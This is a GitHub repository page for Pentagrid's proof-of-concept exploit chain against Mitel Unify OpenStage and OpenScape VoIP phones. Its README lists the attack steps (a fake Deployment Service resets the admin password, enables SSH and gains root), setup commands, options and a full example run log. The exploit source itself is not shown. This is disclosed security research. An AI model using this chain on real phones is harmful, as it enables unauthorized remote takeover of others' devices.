Skip to content
/ openstage-exploit-chain Public

Multiple vulnerabilities in Mitel Unify OpenStage and OpenScape phones allow a remote compromise in the unhardened default configuration and an elevation of privileges to become the root user.

www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/

License

View license
1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

pentagridsec/openstage-exploit-chain

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
LICENSE.txt
LICENSE.txt
 
 
README.rst
README.rst
 
 
make_certs.sh
make_certs.sh
 
 
openstage-fakedls-server.py
openstage-fakedls-server.py
 
 

Repository files navigation

About

This Python script is a proof of concept to demonstrate a fake Deployment Service in the OpenStage/OpenScape world that pushes configuration into unhardened OpenStage and OpenScape phones. In the default configuration, the phone accepts any Deployment Service. The exploitation process is:

  1. The script connects a phone and triggers a connection to a fake Deployment Service.
  2. The Deployment service resets the admin password and enables SSH access.
  3. The script logs in as admin via SSH.
  4. The script elevates privileges to root.
  5. The script enables root login via SSH by restarting the Dropbear service without the root login restriction.

The details are explained in our blog post Remote code execution and elevation of local privileges in Mitel Unify OpenStage and OpenScape VoIP phones.

Pepare to run the exploit

  • Create certificates:
./make_certs.sh
  • Install dependencies via your OS (or use a VENV):
apt install python3-paramiko python3-twisted

How to run the exploit

Overview of options:

$ ./openstage-fakedls-server.py --help
usage: openstage-exploit [-h] --own-ip IPADDR [--own-port PORT] --target-ip IPADDR

Proof of concept exploit for OpenScape/OpenStage VoIP phones.

options:
  -h, --help            show this help message and exit
  --own-ip IPADDR       IP address of fake DLS server.
  --own-port PORT       Port number of fake DLS server. (default: 9999)
  --target-ip IPADDR    IP address of target phone.

The author of this code is not responsible for any damage caused by the use or misuse of this PoC
exploit. This PoCs is intended for educational and research purposes only, and should never be used to
target or exploit systems without explicit permission from the owner.

Example run:

$ ./openstage-fakedls-server.py --own-ip 192.168.23.42 --target-ip 192.168.23.5

The author of this code is not responsible for any damage caused by the
use or misuse of this PoC exploit. This PoCs is intended for educational
and research purposes only, and should never be used to target or exploit
systems without explicit permission from the owner.

+ Set up fake DLS server at port 9999
+ Attacking target 192.168.23.5 using 192.168.23.42:9999 as fake DLS server.
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.

+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Failed to establish SSH connection to [email protected]: Authentication failed.
+ Phone 192.168.23.5 has SSH enabled, but is not rooted, yet. Trying to root it.
+ SSH connected to [email protected] with password "123456".
+ Trying to root a target of type OpenScape Desk Phone CP710.
+ Phone 192.168.23.5 was prepared for rooting.
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.

+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Phone 192.168.23.5: Reenable SSH and change password again.

+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ SSH connected to [email protected] with password "123456".
+ Test if DLS interface TCP port at 192.168.23.5:8085 is open.
+ Send 'Contact me' to target 192.168.23.5:8085.
+ Sending 'Contact me' to target 192.168.23.5:8085 was successful.

+ Target phone 192.168.23.5 connected back to our fake DLS server via POST to /DeploymentService/LoginService.
+ Check if SSH port 192.168.23.5:22 is available.
+ Phone 192.168.23.5 is already/now rooted. There is nothing really to do.

Copyright and Licence

The Proof of concept is published by Pentagrid AG under a BSD licence with a non-military clause. Please read LICENSE.txt for further details.

The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.

About

Multiple vulnerabilities in Mitel Unify OpenStage and OpenScape phones allow a remote compromise in the unhardened default configuration and an elevation of privileges to become the root user.

www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/

Topics

proof-of-concept exploit openstage openscape deployment-service

Resources

Readme

License

View license
Activity
Custom properties

Stars

1 star

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages